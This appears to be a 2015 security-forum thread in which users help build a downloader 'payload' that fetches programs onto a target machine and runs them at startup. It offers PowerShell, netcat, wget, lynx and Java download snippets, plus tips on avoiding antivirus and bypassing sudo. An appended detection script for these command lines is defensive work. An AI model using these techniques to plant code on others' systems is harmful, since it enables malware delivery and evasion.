vailixi Posted July 6, 2015

Looking for a minimal FTP or WGET type program that I can use as part of a payload. Just has to be a really simple and very small program. No command line arguments or GUI needed, just code in the URL of the file you want to get. Doesn't require outside libraries, i.e. curl, boost, .NET, so it is a standalone program that will run on most machines. Just need to get a few files from the internet and save them to a specific location on the target machine. Basically want to download the programs to the machine and run them on startup.

Seems like all of the "simple" programs that will do this require a lib that is like 2400 additional files. I'm wondering if I can do this with maybe 1, 2 or 3 files? If you want to post an example in another language that's cool. Doesn't have to be C. Just easily deployable. Any thoughts?

Jason Cooper Posted July 6, 2015

Have you looked at TFTP [Wikipedia entry, RFC]? It's a lot simpler than other file transfer protocols (which will make it slower), but there are plenty of standalone clients about.

digip Posted July 8, 2015

FTP servers require a login and password by default, so scripting will probably still be needed unless you pre-load all the info into a bundled executable. What OS are you using as the target? Most machines have some form of built-in FTP client, but no FTP works without commands other than scripting it to do the login and downloads for you.

You might want to take advantage of things like PowerShell on a Windows OS since this will be installed by default on anything later than XP - https://www.google.com/#q=powershell+download+file

For Linux, almost all distros have FTP installed, but you can also use lynx if installed on Linux:

    lynx -dump http://somesite.com/file.ext

If using Metasploit and looking for payloads though, just use meterpreter and send the files over using Metasploit itself. Mind you, you want things to stay off disk so they don't get scanned or caught by the target system, so not sure you would want to use tools known to be scanned for that could get you caught, and you can use the OS itself to just do it for you without setting off alarms. What you upload to the target is a whole other ball game and the programs you upload themselves need to pass AV and malware scans.

cooper Posted July 8, 2015

> FTP servers require a login and password by default

The simple ones don't. Anonymous FTP used to be the most common form before all you eeeevil haxorz had your way with them.

digip Posted July 8, 2015

> The simple ones don't. Anonymous FTP used to be the most common form before all you eeeevil haxorz had your way with them.

Anonymous ftp still requires you to enter:

    User: anonymous
    Pass: anonymous@somesite.com (any email address basically)

vailixi (Author) Posted July 15, 2015

I like the PowerShell idea. I think doing this on Windows is going to be pretty simple. Maybe just write out an array of all of the possible networking tools and their possible install locations and loop through until it finds a networking tool that will do the job.

I had a heck of a time trying to do this on Ubuntu because it wanted a sudoer password for each system call. The code executes but it needs user interaction. Debian is set up with the root user as default so you can run a bunch of system calls without any extra permissions.

I'm actually really surprised there isn't some kind of downloader payload already available.

This is the simplest example I could come up with thus far. Python.

    #!/usr/bin/env python3
    # Python 3: urlretrieve lives in urllib.request
    import urllib.request

    # Fetch the URL and save it under the given local file name
    urllib.request.urlretrieve("http://hak5.org/wp-content/uploads/2012/08/hak5-50.png", filename="hak5-50.png")

I suppose I can make that happen with py2exe, one of those Python compilers.

QB64 has some simple networking features but they currently only work on Windows. Not that that is a bad thing.

Also anybody know a scripted way to do this with Metasploit?

I'll probably come up with quite a few ways to do this by the time I'm finished.

Thanks everybody for ideas.

cooper Posted July 15, 2015

Jeez. I thought you wanted light weight. Python is a lot of things, but it installs at a few megs minimum.

On a Linux box, try curl or wget which are both downloading tools you can script up the wazoo, are effectively installed everywhere and won't require root access either.

vailixi (Author) Posted July 16, 2015

+1 for sure. A call to wget might be the easiest way to handle this on a Linux box. PowerShell on Windows as someone had suggested. Maybe just system calls. Coding. Thanks guys.

digip Posted July 16, 2015

I don't have the link handy, but I saw something the other day that bypasses sudo systematically using tools that can execute code without need for root. Namely tar was one of them listed that allows you to start up other programs as root (if I read the article correctly) by piping it out in a bash script.

Personally I'd prefer something encrypted such as scp or sftp, but to use built-in tools, ftp is built into most OS's, even if it sends everything you do in the clear, it works. If you wanted a quick download, there are other ways of downloading in Windows with bat and VBS scripting, although PowerShell would be one way from the command line alone. If you don't specify the whole path in the output part (c:\file.txt) then it saves it to the default user's directory, i.e. c:\users\username\file.txt

PowerShell one-liner:

    (new-object System.Net.WebClient).DownloadFile('http://www.somfile.com/file.txt','c:\file.txt')

Parentheses are required or it will error out. Could write a cmdlet.ps1 script as well but I'm not much of a PowerShell user. I googled for the above example to test myself, which worked and how I found out Windows wants a full path for the output or it puts it in the home directory.

I used to have a VBS one for wscript that came in handy on some XP machines back in the day but sure you can google for help with those.

vailixi (Author) Posted July 17, 2015

> I don't have the link handy, but I saw something the other day that bypasses sudo systematically using tools that can execute code without need for root. Namely tar was one of them listed that allows you to start up other programs as root (if I read the article correctly) by piping it out in a bash script.
>
> Personally I'd prefer something encrypted such as scp or sftp, but to use built-in tools, ftp is built into most OS's, even if it sends everything you do in the clear, it works. If you wanted a quick download, there are other ways of downloading in Windows with bat and VBS scripting, although PowerShell would be one way from the command line alone. If you don't specify the whole path in the output part (c:\file.txt) then it saves it to the default user's directory, i.e. c:\users\username\file.txt
>
> PowerShell one-liner:
>
>     (new-object System.Net.WebClient).DownloadFile('http://www.somfile.com/file.txt','c:\file.txt')
>
> Parentheses are required or it will error out. Could write a cmdlet.ps1 script as well but I'm not much of a PowerShell user. I googled for the above example to test myself, which worked and how I found out Windows wants a full path for the output or it puts it in the home directory.
>
> I used to have a VBS one for wscript that came in handy on some XP machines back in the day but sure you can google for help with those.

Gotta love one liners. These are all really good suggestions.

fugu Posted July 17, 2015

I know someone had already mentioned netcat but

    $ echo -ne "GET /file.txt HTTP/1.1\r\nHost: www.somfile.com\r\n\r\n" | nc www.somfile.com 80 > ./file.txt

EDIT: this will also include the server header information, which will need to be removed. I just forgot about that.

Edited July 17, 2015 by fugu

digip Posted July 17, 2015

> I know someone had already mentioned netcat but
>
>     $ echo -ne "GET /file.txt HTTP/1.1\r\nHost: www.somfile.com\r\n\r\n" | nc www.somfile.com 80 > ./file.txt
>
> EDIT: this will also include the server header information, which will need to be removed. I just forgot about that.

Yeah, I was looking at ways of doing it with telnet logging the output, but as you mentioned, it put all the headers in the file, not to mention messes up the encoding and spacing. netcat adds the headers, but 1, not a native app of any OS, which helps with using built-in tools for downloading, and 2, if using external tools, wget would probably be the easiest to use command line tool.

cooper Posted July 17, 2015

Well, since you're getting the payload to grab a file off of a server you control, you could modify the server to not include any headers for a specific request and just dump the binary into the socket. Might mess up proxy servers and such though, but if you're running an HTTPS server that problem will be circumvented as well.

fugu Posted July 19, 2015

Ok it was bugging me that I couldn't figure this out, but here is a jacked up way to do it:

    $ echo -ne "GET /file.txt HTTP/1.1\r\nHost: www.somfile.com\r\n\r\n" | nc www.somfile.com 80 | sed ':a;N;$!ba;s/\r\n\r\n/\x00/' | sed ':a;N;$!ba;s/[^\x00]*\x00//' > ./file.txt

This "should" remove the headers, however as I've read, sed does not always allow the use of ; so on some systems this might not work.

cooper Posted July 20, 2015

Pipe it through this sed command:

    sed '1,/^\s*$/d'

HTTP gives you all the headers and such, then an empty line, then the actual contents. This sed statement will drop everything up until and including this empty line.

vailixi (Author) Posted August 17, 2015

I'm trying this PowerShell thing on Windows 7.

    Powershell (New-Object System.Net.WebClient).DownloadFile('Url', Path)

Sometimes I'm getting an error like:

    The file name, directoryname, or volume label syntax is incorrect.

Or I get an overload error.

What am I doing wrong? I've never really used PowerShell.

Edited August 17, 2015 by vailixi

digip Posted August 17, 2015

Open cmd.exe > powershell (enter)

    (new-object System.Net.WebClient).DownloadFile('http://www.ticktockcomputers.com/robots.txt','c:\file.txt')

Is path surrounded with single quotes? Not sure if that makes a difference, but I also assume you're being generic, and not using path but instead the full drive path needed.

I just downloaded my site's robots.txt file, code exactly like pasted above.

vailixi (Author) Posted August 18, 2015

I'm getting an error about an exception occurred during a web client request. line 1 char 47.

digip Posted August 18, 2015

Open Wireshark, start capturing, and then try the command. Check Wireshark when the error happens, but I'm guessing it's an issue retrieving the file and you may learn more looking through the traffic to see what happens. To test this, try grabbing a different known file as well, see if it works. If it does it for all files, then maybe some settings in your system, or you need to elevate to admin (although I didn't have to on my system).

cooper Posted August 18, 2015

Verify the use of a slash in a path. Chances are you need double-slashes (because the slash might be the escape char for special characters) or alternatively prepend the path with an '@' to indicate there is nothing to escape in there and slashes are just that: slashes. It's something C# does so I wouldn't be surprised if it leaked into the PowerShell syntax.

vailixi (Author) Posted August 26, 2015

I was having about zero success with PowerShell but I did find a nice Java snippet that works. I need to include some error code so it doesn't crash if the server comes back 403 or something like that. But it does download and save the file. Not exactly a one liner though.

    import java.io.BufferedInputStream;
    import java.io.ByteArrayOutputStream;
    import java.io.FileOutputStream;
    import java.io.IOException;
    import java.io.InputStream;
    import java.net.URL;

    public class DownloadFile {
        public static void main(String[] args) throws IOException {
            String fileName = "filename"; // The file that will be saved on your computer
            URL link = new URL("url");    // The file that you want to download

            // download
            InputStream in = new BufferedInputStream(link.openStream());
            ByteArrayOutputStream out = new ByteArrayOutputStream();
            byte[] buf = new byte[1024];
            int n = 0;
            while (-1 != (n = in.read(buf))) {
                out.write(buf, 0, n);
            }
            out.close();
            in.close();
            byte[] response = out.toByteArray();

            FileOutputStream fos = new FileOutputStream(fileName);
            fos.write(response);
            fos.close();
            // end of download
        }
    }

Got it here: http://code.runnable.com/Uu83dm5vSScIAACw/download-a-file-from-the-web-for-java-files-and-save

Edited August 26, 2015 by vailixi

cooper Posted August 26, 2015

Well, we can reduce that quite a bit:

    import java.io.FileOutputStream;
    import java.io.InputStream;
    import java.net.URL;

    public class DownloadFile {
        // Usage: java DownloadFile <output file> <url>
        public static void main(String[] args) throws Exception {
            FileOutputStream out = new FileOutputStream(args[0]);
            InputStream in = new URL(args[1]).openStream();
            byte[] buf = new byte[1024];
            int bytesRead; // declared outside the loop so the loop condition can see it
            // read() returns -1 at end of stream; only write when bytes were read
            while ((bytesRead = in.read(buf)) >= 0) {
                out.write(buf, 0, bytesRead);
            }
            out.close();
            in.close();
        }
    }

Edited August 26, 2015 by Cooper

vailixi (Author) Posted August 26, 2015

^ Cash money oh something wrong with the bytesRead variable

Edited August 26, 2015 by vailixi

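The download methods suggested in this thread (PowerShell WebClient, wget/curl, a raw HTTP GET piped into netcat, lynx -dump, TFTP) each leave a recognizable process command line. The following is an added example, not code from any post: a defender-side matcher run over constructed process-creation events. The rule names, hosts, users and sample command lines are all assumptions made for illustration.

```python
import re

# Hypothetical rule names; each pattern covers one download method named in the thread.
RULES = [
    ("powershell_webclient", re.compile(r"net\.webclient.*\.download(file|string|data)\s*\(", re.I)),
    ("wget_or_curl_url", re.compile(r"(^|[\s/\\;|&])(wget|curl)(\.exe)?\s[^|;&]*https?://", re.I)),
    ("netcat_raw_http", re.compile(r"\b(GET|POST)\s+\S+\s+HTTP/1\.[01].*\|\s*(nc|ncat|netcat)\b", re.I)),
    ("lynx_dump", re.compile(r"\blynx\b.*\s-dump\b", re.I)),
    ("tftp_get", re.compile(r"\btftp(\.exe)?\b.*\bget\b", re.I)),
]

def normalize(cmdline):
    """Strip cmd.exe carets and PowerShell backticks, then collapse whitespace."""
    cleaned = cmdline.replace("^", "").replace("`", "")
    return re.sub(r"\s+", " ", cleaned).strip()

def classify(cmdline):
    """Return the names of all rules that match one process command line."""
    text = normalize(cmdline)
    return [name for name, pattern in RULES if pattern.search(text)]

def scan(events):
    """events: iterable of (host, user, cmdline). Returns a list of alert dicts."""
    alerts = []
    for host, user, cmdline in events:
        hits = classify(cmdline)
        if hits:
            alerts.append({"host": host, "user": user, "rules": hits, "cmdline": cmdline})
    return alerts

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    ("ws01", "alice", "powershell (New-Object System.Net.WebClient).DownloadFile('http://example.test/a.txt','c:\\a.txt')"),
    ("ws01", "alice", "powershell (new-object system.net.web`client).downloadfile('http://example.test/a','c:\\a')"),
    ("lx02", "bob", "sh -c echo -ne \"GET /file.txt HTTP/1.1\\r\\nHost: example.test\\r\\n\\r\\n\" | nc example.test 80"),
    ("lx02", "bob", "wget -q http://example.test/file.ext -O /tmp/file.ext"),
    ("lx02", "bob", "lynx -dump http://example.test/file.ext"),
    ("ws04", "dave", "tftp -i 192.0.2.10 GET file.bin"),
    ("lx03", "carol", "curl --version"),                       # benign: no URL fetched
    ("ws04", "dave", "notepad.exe c:\\notes\\wget-howto.txt"),  # benign: tool name in a path
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["host"], alert["user"], ",".join(alert["rules"]), "<-", alert["cmdline"])
```

Matching on command lines only works where process-creation logging with full arguments is enabled, and it will not see downloads made through in-process APIs such as the Java and Python snippets above.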